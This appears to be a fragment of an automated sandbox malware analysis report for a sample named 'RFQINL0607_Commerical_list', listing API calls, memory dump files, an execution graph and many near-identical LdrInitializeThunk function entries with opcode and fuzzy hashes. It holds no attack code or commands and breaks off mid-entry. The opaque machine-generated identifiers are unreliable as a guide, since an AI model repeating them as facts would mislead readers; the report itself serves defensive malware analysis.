                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                  • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                  • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:0.1%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                  Signature Coverage:19.7%
                                                                                                                                                                                  Total number of Nodes:152
                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                  execution_graph 55185 3336d530 59 API calls 55186 3338a130 11 API calls 55045 3334bf20 84 API calls 55188 33389d2c 185 API calls 55046 3334df21 8 API calls 55047 333ddb2a 14 API calls 55048 3338ab20 74 API calls 55049 3338cb20 101 API calls 55190 33388520 10 API calls 55050 333dd724 69 API calls 55192 3339ad20 10 API calls 55052 33388322 381 API calls 55193 33381527 64 API calls 55194 333dc51d 8 API calls 55054 3337c310 12 API calls 55056 3337cb10 GetPEB GetPEB GetPEB GetPEB 55057 33358f1e 66 API calls 55058 333d330c 61 API calls 55059 3334c301 98 API calls 55200 33370d01 63 API calls 55201 3337510f 99 API calls 55030 333f8305 55039 33392b10 LdrInitializeThunk 55030->55039 55032 333f83ff 55034 333f83c4 55034->55032 55040 33392b90 LdrInitializeThunk 55034->55040 55035 333f834d 55035->55034 55041 33392ed0 LdrInitializeThunk 55035->55041 55037 333f8430 55037->55034 55042 33392da0 LdrInitializeThunk 55037->55042 55039->55035 55040->55032 55041->55037 55042->55034 55205 333ed503 45 API calls 55206 3334c170 201 API calls 55063 33351f70 84 API calls 55064 3337af72 192 API calls 55065 3337a370 202 API calls 55207 33386d70 8 API calls 55066 3334ef79 66 API calls 55067 33409313 16 API calls 55211 33387960 63 API calls 55213 333d0961 9 API calls 55069 3338bb5b 62 API calls 55216 3335b950 298 API calls 55217 3338415f 61 API calls 55072 3338a350 81 API calls 55075 3334ef5f 10 API calls 55220 3336e547 391 API calls 55077 3334a740 264 API calls 55221 3334c140 66 API calls 55223 33388d4f 86 API calls 55225 3336dd4d 66 API calls 55080 33388fbc 10 API calls 55228 3338b9b0 10 API calls 55083 3340dbcb 35 API calls 55087 333843a0 60 API calls 55230 3334e9ac 212 API calls 55231 333845a3 57 API calls 55089 334163dd 8 API calls 55090 333d3f9f 9 API calls 55092 33389790 256 API calls 55093 333daf97 LdrInitializeThunk LdrInitializeThunk 55237 33382594 72 API calls 55239 3334a980 59 API calls 55242 33389580 77 API calls 55099 3342b781 59 API calls 55100 333473f0 7 API calls 55101 33347bf0 61 API calls 55023 333929f0 LdrInitializeThunk 55245 333591e5 335 API calls 55102 33366fe0 210 API calls 55246 333799e0 59 API calls 55247 3337e9e0 63 API calls 55251 3338a5e7 GetPEB GetPEB LdrInitializeThunk 55104 333f6bde 82 API calls 55252 3334c1d0 61 API calls 55106 33353bd0 16 API calls 55109 3334e3c0 131 API calls 55111 3334bfc0 11 API calls 55112 333d1fc9 91 API calls 55253 333481c0 58 API calls 55254 333651c0 72 API calls 55113 333887c0 9 API calls 55114 3338bbc0 296 API calls 55257 3338c5c6 379 API calls 55115 33347a30 65 API calls 55258 3334b830 377 API calls 55117 333d4638 LdrInitializeThunk 55119 33352e32 83 API calls 55120 33386e30 10 API calls 55122 33387a33 467 API calls 55123 333d8633 395 API calls 55260 333df42f 62 API calls 55124 3334b620 60 API calls 55261 3334b420 65 API calls 55125 33391e2f 71 API calls 55129 33349610 180 API calls 55130 33348e10 9 API calls 55262 33352410 79 API calls 55264 33359810 367 API calls 55265 33392010 9 API calls 55134 3334821b 62 API calls 55135 3334a200 GetPEB 55136 33346e00 RtlDebugPrintTimes RtlDebugPrintTimes 55137 33353e01 58 API calls 55267 33363800 16 API calls 55138 3337d600 447 API calls 55268 3334640d 384 API calls 55270 333cd87c 171 API calls 55140 3338ce70 84 API calls 55143 3334b260 79 API calls 55272 33347060 RtlDebugPrintTimes 55273 33347860 59 API calls 55145 33363660 206 API calls 55274 333fe85d 162 API calls 55275 33351051 60 API calls 55278 33399450 9 API calls 55279 3340f82b 21 API calls 55280 33359046 99 API calls 55151 33353640 72 API calls 55152 3337ea40 60 API calls 55153 3338f240 64 API calls 55154 33396e40 8 API calls 55155 3337ee48 68 API calls 55156 333482b0 60 API calls 55157 334006c6 158 API calls 55282 3334e0a4 61 API calls 55159 3334bea0 70 API calls 55160 333506a0 71 API calls 55283 333500a0 72 API calls 55161 33416ed7 10 API calls 55162 3337faa0 64 API calls 55164 3338cea0 105 API calls 55165 333922a0 463 API calls 55166 333d2e9f 144 API calls 55167 3334a290 292 API calls 55168 3334fe90 14 API calls 55284 3334c090 83 API calls 55171 3336d690 10 API calls 55285 3338b890 104 API calls 55287 334170f1 12 API calls 55173 3337be80 GetPEB GetPEB 55175 33358e8d 71 API calls 55290 333ff8f8 167 API calls 55178 333862f0 228 API calls 55291 3338a4f0 163 API calls 55180 333472e0 8 API calls 55293 333558e0 549 API calls 55181 333766e0 275 API calls 55182 33353ee2 16 API calls 55295 333854e0 58 API calls 55296 3337f4d0 69 API calls 55298 3334b0c0 81 API calls 55183 33353ec0 169 API calls

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 33392B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1 33392b10-33392b1c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 10a7e897b6229b0173e8ff4fecde28ffa923a99a9d230a73f53fb7f0cc3f009a
                                                                                                                                                                                  • Instruction ID: f4594c08d43a2dda3ba8d8d431351080dc7df6194112c3e26e10079c9fb6c838
                                                                                                                                                                                  • Opcode Fuzzy Hash: 10a7e897b6229b0173e8ff4fecde28ffa923a99a9d230a73f53fb7f0cc3f009a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2190023561200C02D584755C450464A0509C7D1303F91C41AA0015A14DCE258A5D77A1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 2 33392b90-33392b9c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: be851a12d70621a1d1145bcade01d8e26146f72d1015796ff1d6c041665a061b
                                                                                                                                                                                  • Instruction ID: 52c793cde7a7ce4567c0fcde30e94e8b1a291ca9e04ff77c6e2cdc40c4f1f287
                                                                                                                                                                                  • Opcode Fuzzy Hash: be851a12d70621a1d1145bcade01d8e26146f72d1015796ff1d6c041665a061b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1890023561208C02D514655C850474A0509C7D0303F55C816A4414A18DCAA588957121
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 3 33392bc0-33392bcc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 0a12b9d46874e83c0a5ac093c79270b3709b35af6670d378381add42e2807c9f
                                                                                                                                                                                  • Instruction ID: 1e4cb1897ba60813a57f2ce0f8e8196fbf7cbd633de59ea0f38004b3eb6cd1cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a12b9d46874e83c0a5ac093c79270b3709b35af6670d378381add42e2807c9f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7090023561200802D504699C55086460509C7E0303F51D416A5014915ECA7588957131
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333929F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 333929f0-333929fc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: c5b18e8d27add47e4fa51b01e7f20a81d46b24f2713a3edd372aa21e680bb769
                                                                                                                                                                                  • Instruction ID: bf8ce0b3647f92e35cc007650170c403386c0eb081e6e250487d8dc20e3d543e
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5b18e8d27add47e4fa51b01e7f20a81d46b24f2713a3edd372aa21e680bb769
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9900229622004030509A95C0704507054AC7D5353351C426F1005910CDA3188656121
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 13 33392f00-33392f0c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: ff93124cf508778852e39c9049fb4674fbe003ffd6c742afbc8d1ea48f9ab09d
                                                                                                                                                                                  • Instruction ID: 6602b6859250109f25da94fee6c647d888519701411aa477fd93b7bcfb6852c4
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff93124cf508778852e39c9049fb4674fbe003ffd6c742afbc8d1ea48f9ab09d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E90022562280442D604696C4D14B070509C7D0303F51C51AA0144914CCD2588656521
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 10 33392e50-33392e5c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: ffb07dc4ec90416e975a76f5c6183d7ac8ff3c2dd31cfd8d48f72cbc006f2bdc
                                                                                                                                                                                  • Instruction ID: e5c6ba11203155cd42ac7cf1245faabd86de8d92e042491bc3770a863ee76595
                                                                                                                                                                                  • Opcode Fuzzy Hash: ffb07dc4ec90416e975a76f5c6183d7ac8ff3c2dd31cfd8d48f72cbc006f2bdc
                                                                                                                                                                                  • Instruction Fuzzy Hash: E490026575200842D504655C4514B060509C7E1303F51C41AE1054914DCA29CC567126
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 11 33392eb0-33392ebc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: c43c7767e4822e90d20bec56027e96989460b9f074d55297c4521debd1fb0043
                                                                                                                                                                                  • Instruction ID: 93ea3d7423e03507f27c70be80f32c9615b3bad12338a7c7f3b44ac4415f9437
                                                                                                                                                                                  • Opcode Fuzzy Hash: c43c7767e4822e90d20bec56027e96989460b9f074d55297c4521debd1fb0043
                                                                                                                                                                                  • Instruction Fuzzy Hash: E290023561240802D504655C491470B0509C7D0303F51C416A1154915DCA3588557571
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 12 33392ed0-33392edc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 7dc254419e1fcc05248b05abaa369b8c4cd4e8080727ae5b0874f429a31ca5f8
                                                                                                                                                                                  • Instruction ID: 14730c94a67a0268ee98749ce35de135f5403c35a0aeb7be408d9235b0d1da4e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dc254419e1fcc05248b05abaa369b8c4cd4e8080727ae5b0874f429a31ca5f8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 59900225A12004424544756C89449064509EBE1213751C526A0988910DC96988696665
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 7 33392d10-33392d1c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: b2cd8ea7481c56427cc9eb3bfff18d6ea6a1a91ccaab85938d43693cddd56569
                                                                                                                                                                                  • Instruction ID: 1a2391f8db10ace215f238d1a98d635e2083274ce020fc5c8dab57b768e2eeb3
                                                                                                                                                                                  • Opcode Fuzzy Hash: b2cd8ea7481c56427cc9eb3bfff18d6ea6a1a91ccaab85938d43693cddd56569
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0290023561200813D515655C4604707050DC7D0243F91C817A0414918DDA668956B121
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 8 33392da0-33392dac LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 34caf07f6802d096b8fde84afa839c59efaae193b29faf6fa98ae541623eddf9
                                                                                                                                                                                  • Instruction ID: 2f34fe213a5a5221462f6ecd4628862961878c3b303ea058fe97132f04db9376
                                                                                                                                                                                  • Opcode Fuzzy Hash: 34caf07f6802d096b8fde84afa839c59efaae193b29faf6fa98ae541623eddf9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15900225A1200902D505755C4504616050EC7D0243F91C427A1014915ECE358996B131
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 9 33392dc0-33392dcc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 93fa5d20a75b029caa30c84111dad81fff7f4b90e3cd98afd6108f422fc2d114
                                                                                                                                                                                  • Instruction ID: 7891c9bb37d03a30bfe5ee002594acfd6a972fa315f5c4c3bb612e58cd778a81
                                                                                                                                                                                  • Opcode Fuzzy Hash: 93fa5d20a75b029caa30c84111dad81fff7f4b90e3cd98afd6108f422fc2d114
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E90027561200802D544755C45047460509C7D0303F51C416A5054914ECA698DD97665
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 4 33392c30-33392c3c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 842582d172775b182ef6a9315b95ac9622c2d7b114ef352497cefff6df40663a
                                                                                                                                                                                  • Instruction ID: 7fc5addc09f6280f836afbe984708e439bd3f3c01153342f841b2652b607c74b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 842582d172775b182ef6a9315b95ac9622c2d7b114ef352497cefff6df40663a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A90022D62300402D584755C550860A0509C7D1203F91D81AA0005918CCD25886D6321
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
